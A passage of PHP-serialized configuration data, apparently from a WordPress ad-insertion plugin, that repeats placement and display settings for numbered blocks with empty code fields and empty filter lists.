users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:3;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 3\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:4;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 4\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:5;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 5\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:6;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 6\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:7;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 7\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:8;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 8\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:9;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 9\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:10;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 10\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:11;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 11\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:12;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 